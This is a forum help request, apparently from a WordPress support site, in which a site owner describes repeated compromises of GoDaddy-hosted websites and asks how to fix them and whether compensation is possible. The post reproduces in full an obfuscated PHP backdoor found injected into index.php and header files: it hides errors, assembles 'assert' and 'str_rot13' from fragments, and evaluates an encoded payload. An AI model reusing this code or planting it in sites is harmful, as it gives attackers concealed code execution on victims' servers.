Godaddy Shared Web Hosting Website Keeps Getting Hacked

  • rdsharma85 · Member ·

    For Past 2 months i am facing issues with some malware attacking on my websites. I recently moved some of my websites to another hosting provider and those are working fine.

    For my Godaddy hosting , i created the websites from scratch again. But in a week’s time it got hacked again . Afterwards i resetted my cpanel hosting and even changed my server location from north america to Asia and recreated the websites again . During the process i have lost substantial amount of time , money and resources apart from the losses of website’s downtime.

    I called godaddy again two days ago, after multiple hours of struggle they restored some old snapshots of hosting , which removed all the hacks. I was able to create the backup for myself as well afterwards and i do have the backup now. The website were working fine till yesterday and i was able to change all the passwords as well. But today again my website got compromised and i found following files affected in multiple folders index.php, menu-header.php, custom-header.php, options-head.php, admin-header.php and admin-footer.php infected with following code:-

    //###=CACHE START=###
    @error_reporting(E_ALL);
    @ini_set(‘error_log’,NULL);
    @ini_set(‘log_errors’,0);
    @ini_set(‘display_errors’, 0);
    @error_reporting(0);
    $wa = ASSERT_WARNING;
    @assert_options(ASSERT_ACTIVE, 1);
    @assert_options($wa, 0);
    @assert_options(ASSERT_QUIET_EVAL, 1);

    $strings = ‘as’; $strings .= ‘se’; $strings .= ‘rt’; $strings2 = ‘st’; $strings2 .= ‘r_r’; $strings2 .= ‘ot13’; $gbz = ‘riny(‘.$strings2(‘base64_decode’);
    $light = @error_reporting(E_ALL);
    @ini_set(‘error_log’,NULL);
    @ini_set(‘log_errors’,0);
    @ini_set(‘display_errors’, 0);
    @error_reporting(0);
    $wa = ASSERT_WARNING;
    @assert_options(ASSERT_ACTIVE, 1);
    @assert_options($wa, 0);
    @assert_options(ASSERT_QUIET_EVAL, 1);

    $strings = ‘as’; $strings .= ‘se’; $strings .= ‘rt’; $strings2 = ‘st’; $strings2 .= ‘r_r’; $strings2 .= ‘ot13’; $gbz = ‘riny(‘.$strings2(‘base64_decode’);
    $light = $strings2($gbz.'(‘nJLtXPScp3AyqPtxnJW2XFxtrlNtMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFxtrlOyL2uiVPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftsFOyoUAyVUfXWUIloPN9VPWbqUEjBv8iLaIlnzyhMTI4LKEipv5cozMiY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKFxhVvMcCGRznQ0vYz1xAFtvLzR1AzIxAQWwZmyzMQLmAwRkBJZ2Z2MxAQuuAzRjZwDkZFVcBjccMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcB2A1pzksp2I0o3O0XPEwqKWfYPOQIIWZG1OHK0ACGx5SD1EHFH1SG1IHYPN1XGftL3IloS9mMKEipUDbWTA1pzjfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfXL3IloS9woT9mMFtxL2tcBjc9VTIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsDccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtoJD1XT1xAFtxK1WSHIISH1EoVaNvKFxcVQ09VPV0AQZjL2DmLwHkAGDmAQRmMQp1MGV2MzLjLwOyAzEyAFVcVUftMKMuoPumqUWcpUAfLKAbMKZbWS9FEISIEIAHJlWwVy0cXGftsDcyL2uiVPEcLaL7PtxWPK0tsD==’));’); $strings($light);
    //###=CACHE END=###

    Is it some coding issue? or wordpress issue ?or Hosting Environment issue?

    Now please suggest me what all steps can be done to fix the issue? i will write things that i have already done
    1) Fixed files manually (specially index.php , .htaccess etc infected file)
    2) Resetted the hosting, changed the server location
    3) The same websites which were earlier hosted on Godaddy are working fine with other hosting provider (so i dont see code issues here)
    4) Called Godaddy tech support and informed that their hosting is compromised but they refused and blamed me loophole in code, passwords etc.

    If Godaddy is at fault , what are my options to take the compensation along with refund for the trouble they have caused me so far.

    The blog I need help with is: (visible only to logged in users)

  • The topic ‘Godaddy Shared Web Hosting Website Keeps Getting Hacked’ is closed to new replies.